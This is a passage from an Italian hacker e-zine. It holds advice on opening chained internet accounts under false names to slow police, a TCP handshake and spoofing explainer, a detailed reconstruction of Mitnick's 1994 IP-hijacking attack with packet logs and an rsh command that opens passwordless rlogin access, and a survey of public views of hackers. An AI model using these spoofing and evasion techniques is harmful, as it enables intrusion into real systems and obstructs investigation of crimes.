base che si trovano su tutte le riviste.

E' normale che se fate un abbonamento con nomi falsi da un abbonamento con il
nome vero... prima o poi vi beccheranno.
Ora viene il bello: colleghiamoci ad internet con l'abbonamento falso e
facciamone un altro falso ad un altro provider. Poi mi collego con il secondo
nome falso e ne sottoscrivo un terzo, e via dicendo. In pratica :(faccio un
esempio con : provider login/pass)

tin kola/brodo --------> libero kola/pasta \/\/\/ mi scollego da tin e mi
riccolego con libero.
libero kola/pasta ------->jumpy koka/kola \/\/\/ mi socollego da libero e mi
ricollego con jumpy.
jumpy koka/kola ------> kataweb e cosi' via continuate finche non siete
stanchi...

Almeno cosi' ci sara' un bel po da divertirsi per la pula.... :))
Questo non è sicuro, ma almeno ci vorra' più tempo per beccarvi. In ogni caso
bisogna essere prudenti e non fare cazzate.

USI E COSTUMI DEL COMPUTEREEE :
Non chiamate il vosto sistema con il vostro nome e cognome, non intestate ne'
regisrate alcun programma a vostro nome, non fate niente di niente a vostro
nome.

Sul computer non ci deve essere nessu indizio su chi siate e cosa facciate nel
la vostra vita reale.
La cosa migliore è mettere 2 (due) hard disk con due sistemi operativi non
comunicanti tra loro. Cioe' non basta fare due partizioni con win. Ma devono
essere due sistemi operativi : tipo win/linux, io ho fatto anche win98/win98
da fare partire con bootmagic(ti chiede all'inizio con quale s.o vuoi partire.
Su di uno ci mettete tutto quello che cazzo vi pare, sull'altro il minimo
indispensabile per un buon hakkaggio. E mi raccomando quando sentite bussare
la porta è non aspettate nessuno.... staccate il secondo hd e mangiatelo...:).

Cosi' dovreste essere al sicuro (almeno virtualmente)

Mi sembra inutile dire: mettete un firewall, disabilitate java, non accettate
cookie ecc ecc

SIATE PARANOICI, LA SICUREZZA DEL MONDO DIPENDE DA VOI.......

CHE LA FORZA SIA CON TEEEEEEEEEEEEE
NON PUO' PIOVERE PER SEMPRE
SEI SOLO CHIACCHIERE E DISTINTIVO
NON ESISTONO IL BENE E IL MALE, E' LA MENTE UMANA A RENDERLI TALI
C'E' ARIA IN ABBONDANZA A SPACEBALL.........
CHE TE LO DICO A FARE
FACCI LA STRETTA PUZZOSA.. COME NON SAI FARE LA STRETTA PUZZOSA???
IMBECILLE NE SENSO CHE IMBELLI...
Beh un paio di cosette da film(chi sa chi cono me lo faccia sapere)

Sperando di aver insegnato qualcosa di utile a chi non lo sapeva, e di aver
fatto fare 4 risate a chi queste cose le da per scontate, io mi congedo
ricordandovi che cmq potete scrivermi per bestemmie di vario genere at :

sash4@inwind.it
happy hack

---Sash4---

----------------------------------------------------------------[ hAcKinG ]---
===] BASI DI UN COLLEGAMENTO TRA DUE COMPUTER, 3-WAY_HANDSHAKE, SYNFLOOD ]====
-----[ WhItEfIrE ]------------------------------------------------------------

Ciao a tutti. eccomi addirittura al mio secondo articolo! NOn ci avrei mai
creduto, eppure eccomi qui.

ATTENZIONE:
non voglio essere accusato di copy & paste perché questo è materiale
facilmente reperibile sulla rete!

In questo articolo intendo spiegare le basi di un semplice colegamento tra due
computer (telnet, web, ecc ecc).
Questi collegamenti funzionano tramite lo scambio di pacchetti IP, che
contengono
vari dati come la provenienza e destinazione, tipo di servizio, protocollo ecc
ecc. Potete paragonare questi pakketti all' header di una mail (c'è tutto su
chi
la manda e chi la riceve, manca solo il vostro indirizzo e numero di telefono
=).
Prendiamo per esempio il collegamento tra un il nostro pc e un web server su
cui
abbiamo una shell, il server per rispondere deve prima riconoscerci e sapere
il nostro ip, quì entrano in gioco tre tipi di pacchetti:

[-] SYN (eh si, avete letto bene, è proprio lui il famigerato SYN tanto usato
negli attacchi - MIMIO che pauraaaaaaaaaaaaaaaa!)

[ -] ISNa e ISNb ( è una serie di numeri )

[-] ACK (anche questo è usato per i flood, ma meno del SYN) noto anche come
ACKNOWLEDGE (riconoscimento [per chi ha 1- in Inglese]).
Ma questi sono solo i comandi principali che possono comparire in una
connessione,
ecco gli altri:
FIN = Finished, una delle tue makkine ha finito di inviare i dati
PSH = Push, Invia i dati al ricevente il prima possibile
RST = rompi la connessione
URG = dati urgenti in arrivo dall'origine.

La connessione e soprattutto il riconoscimento avvengono così:

IIIIIIIIIIIIII IIIIIIIIIIIIII
I Computer A I --------------------I Computer B I
IIIIIIIIIIIIII IIIIIIIIIIIIII

( nostro pc ) ( web server )

Il computer A tenta di connettersi e invia a B un pakketto SYN (Syncronyze
Sequence Number) e un altro pakketto l'ISNa che è una serie di dati sotto
forma
di numeri, il SYN non è altro che una richiesta di connessione che chiede a B
di controllare l'ISNa (mandato da A) e se tutto va bene di avviare la
procedura
di login. Il computer B ricevuto il SYN risponde con un SYN e un ISNb e infine
un ACK che non è altro che l'ISNa incrementato di 1, questa incrementazione
permette di capire in che direzione vanno i dati.
Infine A risponde con l'ACK contenente l'ISNb.
In poche parole:
3 WAY HANDSHAKE

A ==> SYN, ISNa ==> B
B ==> SYN; ISNb, ACK (ISNa + 1) ==> A
A ==> ACK (ISNb) ==> B

Questo tipo di connessione si chiama 3 WAY HANDSHAKE
Spero che abbiate capito, perchè tanto non ve lo rispiego! :))
Ogni pakketto ha dei propri valori, questo è lo skema di un semplice pakketto
IP:

___________________________________________________________________________
4-bit | 4-bit | 8-bit | 16-bit |
| Lunghezza | Tipo di | Lunghezza |
Versione | Intestazione | Servizio | Totale |
--------------------------------------------------------------------------|
16-bit | 3-bit | 13-bit |
| | Variabili di |
Identificazione | Flags | Frammento |
--------------------------------------------------------------------------|
8-bit | 8-bit | 16-bit |
Tempo da | | |
"Vivere" | Protocollo | Controllo Intestazione |
--------------------------------------------------------------------------|
32-bit |
|
Indirizzo di provenienza |
--------------------------------------------------------------------------|
32-bit |
|
Indirizzo di destinazione |
--------------------------------------------------------------------------|
Opzioni ( possono anche non esserci ) |
|
--------------------------------------------------------------------------|
|
Dati ( finalmente! ) |
__________________________________________________________________________|

Questo Š un pakketto molto inaffidabile e per questo viene solamente (o quasi)
utilizzato in combinazione con altri pakketti + affidabili (TCP, UDP).
Ma l'IP e un pacchetto molto importante poichŠ senza di esso non esisterebbe
alcun tipo di connessione
Come potete vedere ogni informazione del pakketto ha un suo valore: 3, 4, 8,
13, 16 e 32 Bit.
Le informazioni + rilevanti nel pakketto sono l'ip di partenza e destinazione
e sono a 32 Bit.
Questo invece è lo schema di un pacchetto per il protocollo TCP:

TCP:
_________________________________________________________________________
16-bit | 16-bit |
| Porta di |
Porta di provenienza | Destinazione |
-------------------------------------------------------------------------|
32-bit |
|
Sequenza di numeri |
-------------------------------------------------------------------------|
32-bit |
|
Numeri di indentificazione |
-------------------------------------------------------------------------|
4-bit | 6-bit | 6-bit | 16-bit |
Lunghezza | Riservato | Flags | Grandezza |
Intestazione | | | Finestra |
-------------------------------------------------------------------------|
16-bit | 16-bit |
Controllo del TCP | Indice |
| Urgente |
-------------------------------------------------------------------------|
Opzioni (possono non esserci) |
-------------------------------------------------------------------------|
|
Dati ( di lunghezza variabile ) se ci sono |
_________________________________________________________________________|

EVOLUTIONS

[-] Il 3 Way Handshake e soprattutto i pacchetti SYN possono essere usati in
vari
attacchi come il SYN attack che tempesta un Ip di SYN che vengono allocati
nella
memoria del server in attesa di un ACK e quindi una connessione (che non
avverr…
mai, povero illuso :-B Bhuahahahaha).
Il codice C per linux, ( *NIX POWER!!! ) si trova tra gli allegati.



[-] Spoofing
In una connessione tramite pakketti, qualunque essa sia, è possibile spoofare
i pakketti.

--------------------- MI RIVOLGO A VOI, O OTTUSI --------------------------
Spoofare significa modificare l'header dei pakketti, per cambiarne l' ip di
provenienza!
--------------------------------- EOF -------------------------------------

Spoofando i pakketti ci possiamo o ANONIMIZZARE o SPACCIARCI per qualcun
altro.
- Anonimizzandoci possiamo evitare di essere scoperti
- Spacciandoci per qualcun'altro possiamo ottenere l'accesso ad un server che
permette le connessioni solo da determinati host! (politica errata)
- dulcis in Fundo le tanto amate fakemail
ALTRO CHE TROJANS QUESTA E' ARTE!!!!!!!!!!!!!!!!!!!!!1

Comunque anche per questa volta è finita (sigh), per scendere nei particolari
dello spoofing ci vorrebbero almeno 100 pagine! :)

ByeZ

---WhItEfIrE---

----------------------------------------------------------------[ HacKinG ]---
===] DESCRIZIONE DI UN ATTACCO DI MITNICK -IP HJACKING- ]=====================
-----[ Kalidor ]--------------------------------------------------------------

-Premessa-
Questo articolo e' stato scritto sulla base del rapporto di Tsutomu Shimomura
(tsutomu@ariel.sdsc.edu) del 25 gennaio 1995 (l'ho tradotto e ho cercato di
spiegarlo in modo piu' semplice). Per commenti intelligenti
mailto:kalidor@tin.it (le flame verranno ignorate). I concetti di base sono
tutti spiegati nell'articolo di Whitefire (basi di un collegamento tra due
computer, 3-way handshake, synflood).

-Introduzione-
L'attacco e' stato effettuato il 25 dicembre 1994 (il rapporto venne inviato
il mese dopo) contro la rete di computer di Tsutomu Shimomura, un fisico
informatico della San Diego Supercomputer Center.
Shimomura lavora anche come esperto della sicurezza, il che rendeva il suo
sistema un ambito bersaglio per gli attacchi e cio' ci permette anche di
sapere nei dettagli cosa accadde. Infatti Shimomura usava tcpdump per
monitorare il traffico in entrata alla sua rete internet e mandava
periodicamente i log a un'altra rete per analisi.

Sono stati usati due tipi di attacco, IP spoofing e TCP sequence number
prediction (previsione dei numeri sequenziali, in poche parole la previsione
degli isn e ack). Questo tipo di attacco si chiama IP Hijacking, cioe'
l'intrusione in una connessione TCP.

-Configurazione-
Kevin Mitnick effettuo' il suo attacco da 2 server, toad.com e un server a
Chicago, apollo.it.luc.edu (che da ora chiamero' apollo).

La rete di Shimomura era cosi' composta:
server1: uno SPARCstation con Solaris 1 che hostava x-terminal
x-terminal: uno SPARCstation senza HD con Solaris 1
obbiettivo: l'apparente obbiettivo dell'attacco

-Descrizione-
L'attacco inizia alle 14:09:32. Vengono effettuati dei primi scan da toad.com:

14:09:32 toad.com# finger -l @target
14:10:21 toad.com# finger -l @server1
14:10:50 toad.com# finger -l root@server1
14:11:07 toad.com# finger -l @x-terminal
14:11:38 toad.com# showmount -e x-terminal
14:11:49 toad.com# rpcinfo -p x-terminal
14:12:05 toad.com# finger -l root@x-terminal

Lo scopo di questi scan e' probabilmente quello di determinare se c'e' qualche
rapporto di fiducia tra i vari server (es: un accesso rlogin senza password)
che potrebbe essere sfruttato con un attacco di IP spoofing. I numeri delle
sport (porte di sorgente) indicano che l'attaccante è root su toad.com .
Questi scan sono simili a quelli effettuati da SATAN, ma non automatici.

Nella seconda fase dell'attacco vengono inviati 30 pacchetti SYN alla porta di
rlogin di server1. Questi pacchetti provengono da un indirizzo ip inesistente
(130.92.6.97) in modo da impedire qualsiasi risposta da esso. Per loggarli e'
stato usato tcpdump. Per indicare le flag esso usa:

S = syn
P = push
R = rst
F = fin
U = urg

Ecco il log dei pacchetti (server.login indica server1 alla porta di rlogin):

14:18:22.516699 130.92.6.97.600 > server.login: S 1382726960:1382726960(0)
win 4096
14:18:22.566069 130.92.6.97.601 > server.login: S 1382726961:1382726961(0)
win 4096
14:18:22.744477 130.92.6.97.602 > server.login: S 1382726962:1382726962(0)
win 4096
14:18:22.830111 130.92.6.97.603 > server.login: S 1382726963:1382726963(0)
win 4096
14:18:22.886128 130.92.6.97.604 > server.login: S 1382726964:1382726964(0)
win 4096
14:18:22.943514 130.92.6.97.605 > server.login: S 1382726965:1382726965(0)
win 4096
14:18:23.002715 130.92.6.97.606 > server.login: S 1382726966:1382726966(0)
win 4096
14:18:23.103275 130.92.6.97.607 > server.login: S 1382726967:1382726967(0)
win 4096
14:18:23.162781 130.92.6.97.608 > server.login: S 1382726968:1382726968(0)
win 4096
14:18:23.225384 130.92.6.97.609 > server.login: S 1382726969:1382726969(0)
win 4096
14:18:23.282625 130.92.6.97.610 > server.login: S 1382726970:1382726970(0)
win 4096
14:18:23.342657 130.92.6.97.611 > server.login: S 1382726971:1382726971(0)
win 4096
14:18:23.403083 130.92.6.97.612 > server.login: S 1382726972:1382726972(0)
win 4096
14:18:23.903700 130.92.6.97.613 > server.login: S 1382726973:1382726973(0)
win 4096
14:18:24.003252 130.92.6.97.614 > server.login: S 1382726974:1382726974(0)
win 4096
14:18:24.084827 130.92.6.97.615 > server.login: S 1382726975:1382726975(0)
win 4096
14:18:24.142774 130.92.6.97.616 > server.login: S 1382726976:1382726976(0)
win 4096
14:18:24.203195 130.92.6.97.617 > server.login: S 1382726977:1382726977(0)
win 4096
14:18:24.294773 130.92.6.97.618 > server.login: S 1382726978:1382726978(0)
win 4096
14:18:24.382841 130.92.6.97.619 > server.login: S 1382726979:1382726979(0)
win 4096
14:18:24.443309 130.92.6.97.620 > server.login: S 1382726980:1382726980(0)
win 4096
14:18:24.643249 130.92.6.97.621 > server.login: S 1382726981:1382726981(0)
win 4096
14:18:24.906546 130.92.6.97.622 > server.login: S 1382726982:1382726982(0)
win 4096
14:18:24.963768 130.92.6.97.623 > server.login: S 1382726983:1382726983(0)
win 4096
14:18:25.022853 130.92.6.97.624 > server.login: S 1382726984:1382726984(0)
win 4096
14:18:25.153536 130.92.6.97.625 > server.login: S 1382726985:1382726985(0)
win 4096
14:18:25.400869 130.92.6.97.626 > server.login: S 1382726986:1382726986(0)
win 4096
14:18:25.483127 130.92.6.97.627 > server.login: S 1382726987:1382726987(0)
win 4096
14:18:25.599582 130.92.6.97.628 > server.login: S 1382726988:1382726988(0)
win 4096
14:18:25.653131 130.92.6.97.629 > server.login: S 1382726989:1382726989(0)
win 4096

Si puo' notare che l'isn di ogni pacchetto (es: 1382726960 quello del primo)
e' incrementato di 1 dal precendente, invece che di 128000 (che sarebbe il
default dei server dell'epoca).

Cio' indica che sono pacchetti inviati manualmente. Il loro scopo e' quello di
riempire la coda di connessione di server1 con connessioni mezze aperte, in
modo che server1 non risponda piu' a quella porta. Questo attacco e' chiamato
syn flooding (come spiegato nell'articolo di Whitefire) e permette di
effettuare l'attacco di IP hijacking senza che server1 possa interferire.

Ora vengono effettuati 20 tentativi di connessione da apollo a x-terminal su
telnet (x-terminal.shell indica x-terminal alla porta di telnet):

14:18:25.906002 apollo.it.luc.edu.1000 > x-terminal.shell:
S 1382726990:1382726990(0) win 4096
14:18:26.094731 x-terminal.shell > apollo.it.luc.edu.1000:
S 2021824000:2021824000(0) ack 1382726991 win 4096
14:18:26.172394 apollo.it.luc.edu.1000 > x-terminal.shell:
R 1382726991:1382726991(0) win 0
14:18:26.507560 apollo.it.luc.edu.999 > x-terminal.shell:
S 1382726991:1382726991(0) win 4096
14:18:26.694691 x-terminal.shell > apollo.it.luc.edu.999:
S 2021952000:2021952000(0) ack 1382726992 win 4096
14:18:26.775037 apollo.it.luc.edu.999 > x-terminal.shell:
R 1382726992:1382726992(0) win 0
14:18:26.775395 apollo.it.luc.edu.999 > x-terminal.shell:
R 1382726992:1382726992(0) win 0
14:18:27.014050 apollo.it.luc.edu.998 > x-terminal.shell:
S 1382726992:1382726992(0) win 4096
14:18:27.174846 x-terminal.shell > apollo.it.luc.edu.998:
S 2022080000:2022080000(0) ack 1382726993 win 4096
14:18:27.251840 apollo.it.luc.edu.998 > x-terminal.shell:
R 1382726993:1382726993(0) win 0
14:18:27.544069 apollo.it.luc.edu.997 > x-terminal.shell:
S 1382726993:1382726993(0) win 4096
14:18:27.714932 x-terminal.shell > apollo.it.luc.edu.997:
S 2022208000:2022208000(0) ack 1382726994 win 4096
14:18:27.794456 apollo.it.luc.edu.997 > x-terminal.shell:
R 1382726994:1382726994(0) win 0
14:18:28.054114 apollo.it.luc.edu.996 > x-terminal.shell:
S 1382726994:1382726994(0) win 4096
14:18:28.224935 x-terminal.shell > apollo.it.luc.edu.996:
S 2022336000:2022336000(0) ack 1382726995 win 4096
14:18:28.305578 apollo.it.luc.edu.996 > x-terminal.shell:
R 1382726995:1382726995(0) win 0
14:18:28.564333 apollo.it.luc.edu.995 > x-terminal.shell:
S 1382726995:1382726995(0) win 4096
14:18:28.734953 x-terminal.shell > apollo.it.luc.edu.995:
S 2022464000:2022464000(0) ack 1382726996 win 4096
14:18:28.811591 apollo.it.luc.edu.995 > x-terminal.shell:
R 1382726996:1382726996(0) win 0
14:18:29.074990 apollo.it.luc.edu.994 > x-terminal.shell:
S 1382726996:1382726996(0) win 4096
14:18:29.274572 x-terminal.shell > apollo.it.luc.edu.994:
S 2022592000:2022592000(0) ack 1382726997 win 4096
14:18:29.354139 apollo.it.luc.edu.994 > x-terminal.shell:
R 1382726997:1382726997(0) win 0
14:18:29.354616 apollo.it.luc.edu.994 > x-terminal.shell:
R 1382726997:1382726997(0) win 0
14:18:29.584705 apollo.it.luc.edu.993 > x-terminal.shell:
S 1382726997:1382726997(0) win 4096
14:18:29.755054 x-terminal.shell > apollo.it.luc.edu.993:
S 2022720000:2022720000(0) ack 1382726998 win 4096
14:18:29.840372 apollo.it.luc.edu.993 > x-terminal.shell:
R 1382726998:1382726998(0) win 0
14:18:30.094299 apollo.it.luc.edu.992 > x-terminal.shell:
S 1382726998:1382726998(0) win 4096
14:18:30.265684 x-terminal.shell > apollo.it.luc.edu.992:
S 2022848000:2022848000(0) ack 1382726999 win 4096
14:18:30.342506 apollo.it.luc.edu.992 > x-terminal.shell:
R 1382726999:1382726999(0) win 0
14:18:30.604547 apollo.it.luc.edu.991 > x-terminal.shell:
S 1382726999:1382726999(0) win 4096
14:18:30.775232 x-terminal.shell > apollo.it.luc.edu.991:
S 2022976000:2022976000(0) ack 1382727000 win 4096
14:18:30.852084 apollo.it.luc.edu.991 > x-terminal.shell:
R 1382727000:1382727000(0) win 0
14:18:31.115036 apollo.it.luc.edu.990 > x-terminal.shell:
S 1382727000:1382727000(0) win 4096
14:18:31.284694 x-terminal.shell > apollo.it.luc.edu.990:
S 2023104000:2023104000(0) ack 1382727001 win 4096
14:18:31.361684 apollo.it.luc.edu.990 > x-terminal.shell:
R 1382727001:1382727001(0) win 0
14:18:31.627817 apollo.it.luc.edu.989 > x-terminal.shell:
S 1382727001:1382727001(0) win 4096
14:18:31.795260 x-terminal.shell > apollo.it.luc.edu.989:
S 2023232000:2023232000(0) ack 1382727002 win 4096
14:18:31.873056 apollo.it.luc.edu.989 > x-terminal.shell:
R 1382727002:1382727002(0) win 0
14:18:32.164597 apollo.it.luc.edu.988 > x-terminal.shell:
S 1382727002:1382727002(0) win 4096
14:18:32.335373 x-terminal.shell > apollo.it.luc.edu.988:
S 2023360000:2023360000(0) ack 1382727003 win 4096
14:18:32.413041 apollo.it.luc.edu.988 > x-terminal.shell:
R 1382727003:1382727003(0) win 0
14:18:32.674779 apollo.it.luc.edu.987 > x-terminal.shell:
S 1382727003:1382727003(0) win 4096
14:18:32.845373 x-terminal.shell > apollo.it.luc.edu.987:
S 2023488000:2023488000(0) ack 1382727004 win 4096
14:18:32.922158 apollo.it.luc.edu.987 > x-terminal.shell:
R 1382727004:1382727004(0) win 0
14:18:33.184839 apollo.it.luc.edu.986 > x-terminal.shell:
S 1382727004:1382727004(0) win 4096
14:18:33.355505 x-terminal.shell > apollo.it.luc.edu.986:
S 2023616000:2023616000(0) ack 1382727005 win 4096
14:18:33.435221 apollo.it.luc.edu.986 > x-terminal.shell:
R 1382727005:1382727005(0) win 0
14:18:33.695170 apollo.it.luc.edu.985 > x-terminal.shell:
S 1382727005:1382727005(0) win 4096
14:18:33.985966 x-terminal.shell > apollo.it.luc.edu.985:
S 2023744000:2023744000(0) ack 1382727006 win 4096
14:18:34.062407 apollo.it.luc.edu.985 > x-terminal.shell:
R 1382727006:1382727006(0) win 0
14:18:34.204953 apollo.it.luc.edu.984 > x-terminal.shell:
S 1382727006:1382727006(0) win 4096
14:18:34.375641 x-terminal.shell > apollo.it.luc.edu.984:
S 2023872000:2023872000(0) ack 1382727007 win 4096
14:18:34.452830 apollo.it.luc.edu.984 > x-terminal.shell:
R 1382727007:1382727007(0) win 0
14:18:34.714996 apollo.it.luc.edu.983 > x-terminal.shell:
S 1382727007:1382727007(0) win 4096
14:18:34.885071 x-terminal.shell > apollo.it.luc.edu.983:.
S 2024000000:2024000000(0) ack 1382727008 win 4096
14:18:34.962030 apollo.it.luc.edu.983 > x-terminal.shell:
R 1382727008:1382727008(0) win 0
14:18:35.225869 apollo.it.luc.edu.982 > x-terminal.shell:
S 1382727008:1382727008(0) win 4096
14:18:35.395723 x-terminal.shell > apollo.it.luc.edu.982:
S 2024128000:2024128000(0) ack 1382727009 win 4096
14:18:35.472150 apollo.it.luc.edu.982 > x-terminal.shell:
R 1382727009:1382727009(0) win 0
14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell:
S 1382727009:1382727009(0) win 4096
14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981:
S 2024256000:2024256000(0) ack 1382727010 win 4096
14:18:35.983078 apollo.it.luc.edu.981 > x-terminal.shell:
R 1382727010:1382727010(0) win 0

I pacchetti inviati da apollo sono sempre incrementati di 1 ma questa volta
gli ack di x-terminal vengono inviati a un ip esistente. Ed e' proprio questo
che vuole l'attaccante, egli vuole determinare il comportamento del generatore
di isn di x-terminal. Si nota anche che stavolta vengono inviati anche dei
pacchetti di RST per chiudere le connessioni, in modo da non intasare anche
x-terminal che sara' l'obbiettivo dell'attacco di spoofing.

Ora l'attaccante sa che gli isn incrementano di 128000 ogni connessione
(osservando quelli consecutivi), quindi il prossimo isn sara' piu' grande di
128000 dell'ultimo.

Ora inizia l'attacco di IP hijacking vero e proprio. Vediamo una richiesta di
connessione SYN da server1 a x-terminal su rlogin. In realta' e' l'attaccante
che sta spoofando il pacchetto in modo da farlo provenire apparentemente da
server1.

L'ipotesi dell'attaccante e' che x-terminal si fida di server1 e che fara'
qualunque cosa server1 (o qualcuno che si finge tale) chiedera'. Ora
x-terminal risponde con un syn-ack che deve essere ackappato da server1
(ricordate 3-way handshaking?) perche' sia aperta la connessione. Dato che il
vero server1 non puo' rispondere a x-terminal (se potesse farlo risponderebbe
con un RST in modo da terminare la connessione non richiesta da lui, capito
lo scopo del syn flood?) viene generato un altro pacchetto spoofato da server1
contenente l'ack per aprire la connessione. A questo punto e' aperta una
falsa connessione tra server1 e x-terminal su rlogin e puo' essere inviato
qualsiasi comando di shell. Normalmente sarebbe stato necessario conoscere
l'isnb inviato da x-terminal per rispondere con un secondo ACK valido, ma
l'attaccante sa gia' qual'e', dato che puo' essere predetto in base alle
risposte di x-terminal ai 20 tentativi di connessione precedenti (ultimo isnb
+ 128000). Ecco i 2 pacchetti spoofati inviati dall'attaccante:

14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0)
win 4096
14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096

Il secondo ack e' 2024384001 che sarebbe 2024256000 (vedi l'ultimo pacchetto
inviato da x-terminal) + 128000 + 1 (si aggiunge ancora 1 come spiegato
nell'articolo di Whitefire).

Adesso l'attaccante puo' inviare il comando che gli permettera' l'accesso a
x-terminal:

14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096
14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096
14:18:38.287404 server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096

che corrisponde a:

14:18:37 server# rsh x-terminal "echo + + >>/.rhosts"

Quel comando, come molti sanno, permette di attivare l'accesso rlogin senza
password a CHIUNQUE, attaccante compreso; in modo piu' specifico scrive "+ +"
nel file /.rhosts, che contiene la lista degli host che possono accedere a
rlogin senza password, e quel + + equivale a dire "tutti". Ora il nostro
attaccante ha accesso totale a x-terminal.

Per finire viene chiusa la falsa connessione:

14:18:41.347003 server.login > x-terminal.shell: . ack 2 win 4096
14:18:42.255978 server.login > x-terminal.shell: . ack 3 win 4096
14:18:43.165874 server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096
14:18:52.179922 server.login > x-terminal.shell: R 1382727043:1382727043(0)
win 4096
14:18:52.236452 server.login > x-terminal.shell: R 1382727044:1382727044(0)
win 4096

(questi pacchetti servono a chiudere una connessione secondo il 4-way
connection closing del tcp: in parole povere i 2 membri della connessione
mandano un pacchetto con una FIN che deve a sua volta essere ackappata,
richiedendo 4 pacchetti in tutto)

E vengono chiuse tutte le connessioni mezze aperte su server1, in modo da
liberarlo:

14:18:52.298431 130.92.6.97.600 > server.login: R 1382726960:1382726960(0)
win 4096
14:18:52.363877 130.92.6.97.601 > server.login: R 1382726961:1382726961(0)
win 4096
14:18:52.416916 130.92.6.97.602 > server.login: R 1382726962:1382726962(0)
win 4096
14:18:52.476873 130.92.6.97.603 > server.login: R 1382726963:1382726963(0)
win 4096
14:18:52.536573 130.92.6.97.604 > server.login: R 1382726964:1382726964(0)
win 4096
(ecc...)

Ora il povero server1 manda un RST per chiudere una connessione che non ha mai
fatto (cosa che avrebbe fatto subito dopo il primo SYN dell'attaccante se non
fosse stato intasato), ma ormai e' troppo tardi.

-Riassunto-
* L'attaccante fa degli scan da toad.com per verificare se esiste una
condizione di fiducia tra server1 e x-terminal
* esegue un synflood verso server1 per impedirgli di interferire col suo
attacco
* fa dei tentativi di connessione da apollo a x-terminal per determinare
l'isnb successivo e quindi generare un ack valido
* stabilisce una connessione falsa tra server1 (spoofato) e x-terminal usando
l'isnb predetto
* invia il comando "echo + + >>/.rhosts" per permettergli l'accesso a
x-terminal
* chiude la falsa connessione con x-terminal e libera server1 resettando tutte
le connessioni aperte dal synflood

-Epilogo-
Per molti di voi questa cosa vi sara' sembrata esageratamente complessa, per
non dire incomprensibile:)
in effetti e' un attacco molto raffinato che si distacca molto dalle
metodologie di attacchi comuni, come exploit prefabbricati pronti all'uso e
roba varia, che sono molto semplici. Io ho cercato di rendere la cosa piu'
comprensibile, anche se e' cosi' complicato il processo che e' difficile
spiegarlo con parole semplici. Consolatevi che il documento originale era
molto peggio e in inglese:)

(lo potete trovare a
http://www.hack-net.com/html/knowledge_center/
hnc_view_doc.php3?show_doc=MoreMitnick.txt).

Vi consiglio, se non avete capito, di rileggere piu' attentamente che non e'
cosi' difficile come sembra.
Chiedo scusa a Oldiron se non gli ho fatto l'articolo promesso per ais2
(scuola del kazzo).

Spero sia piu' contento ora:)

(NOTA DI OLDIRON61: Azz se sono contento! ;-))

cya

---Kalidor---



----------------------------------------------------------------[ HacKinG ]---
===] GIUDIZIO DEI NAVIGATORI SUGLI HACKERS ]==================================
-----[ ZETA ]-----------------------------------------------------------------


Info:
L'argomento mi è venuto in mente, mentre guardavo la TV (non dirò il canale)
ed
un giornalista parlava di Hackers,ho pensato :
"ma che disinformazione,se i giornalisti dicono queste sciocchezze figuriamoci
la gente comune",così ho deciso di fare un sondaggio e vedere la gente che ne
pensa !!!!.

Bene ora possiamo cominciare!

********************************START*****************************************

A ) Hai mai sentito la parola Hacker ?
B ) Chi sono ?
C ) le tue considerazioni
<_Lupin_>

A) sentita dove?
forse in 1 telenovelas in tv
non mi sembra io leggo altre cose
no, forse sono troppo anziana x saperlo

<Zulu__>

A) beh si che l'ho sentita

B) gli hackers sono dei pirati informatici che hanno una grande conoscenza
del computer ci sta chi la usa per fare del "bene" e
chi per fare del "male"
I piu pericolosi non sono quelli che attaccano i siti web
ma quelli che attaccano i navigatori con bombe e-mai cioe virus che
infettano il computer e si diffondono nella rete oppure quelli che si
trovano....
nelle chat line come questa e che sono capaci di
inviare dei virus chiamati trojan che gli permettono di entrare nei pc
delle
persone che hanno accettato questo virus e possono avere accesso a tutte
le informazioni cancellandole o nascondendole dove vogliono
poi ci sono i piccoli hackers...

C) beh e' giusto che imparino
internet e' il futuro
e devono farne parte tutti
tutti devono saperlo usare

<_KHIM>
A) si ne parlano sempre in tv

B) sono delinquenti che si approfittano della povera gente rubando
carte di credito e non so quante altre cose ancora

C) penso che li dovrebbero arrestare e non farli stare piu' vicino
ad un computer

<Anonimo (non ha voluto che inserissi il suo nick)>

A) si ne parlano molto anche i miei amici

B) gli hackers sono persone che con l'aiuto di virus entrano nei computer
per rubare informazioni e poi distruggono il computer in cui sono entrati

C) penso che siano dei geni ho amici che fanno queste cose ma non so
come fanno una volta sono entrati anche nel mio di computer

(e magari aprivano e chiudevano lo sportellino del tuo lettore CD e cose
così)

si come fai a saperlo ? dimmi come si fa ti prego!

(cambia amici e' meglio, che hackers non sono)



Non ho riportato tutte le interviste
per non annoiare troppo il lettore,ma la maggior parte degli intervistati
sull'argomento non si è espressa in modo esauriente, addirittura molti
quando hanno sentito la parola hacker chiudevano la connessione o si
rifiutavano di parlare,cercando di cambiare argomento.

La conclusione a cui sono arrivato è che la disinformazione
ha colpito la maggioranza della gente,infatti non essendo interessata
all'argomento "abbocca" a tutto ciò che gli viene detto,senza curarsi
di approfondire e di trovare la verità.

Ho trovato pochissimi che erano favorevoli alla "cultura" hackers, essi sono
stati spesso definiti dei delinquenti,c'e' chi invocava addirittura la galera
per tutti gli hackers senza fare nessuna distinzione.

Molti non distinguevano i lamers dagli hackers,come pure i crackers da questi,
insomma vige la confusione assoluta.

Per ora mi fermo qui,poiche' non voglio mettermi a fare filosofia, comunque il
messaggio che voglio dare è quello di stare attenti a tutte le informazioni
che vi vengono date e soprattutto state attenti a come vi vengono poste,
cercate di filtrare,ogni aspetto ha la sua verità nascosta ed il nostro
compito deve essere quello di trovarla.

*********************************END*****************************************

Ringrazio tutti gli intervistati per la loro collaborazione.

Un saluto a tutto il gruppo!!!!
Ci VeDiAmO Al PrOsSiMo ArTiCoLo…………………..Bye Bye by Z


Mi trovate su IRC con il nick ZETA,SHADOW-Z o più raramente ZED.

****************************************************************************


---ZETA---

----------------------------------------------------------------[ hAcKinG ]---
===] CLUSTERING & SQL ]=======================================================
-----[ Maggiorana ]-----------------------------------------------------------


PRE-REQUISITI DI SISTEMA

I prerequisiti sotto elencati vanno letti prestando la massima attenzione in
quanto risultano essere fondamentali per la corretta configurazione del
Clustering .
Altrimenti sono guai.
Pur prestando massima cura e testando personalmente la correttezza del doc
errare umanum est,
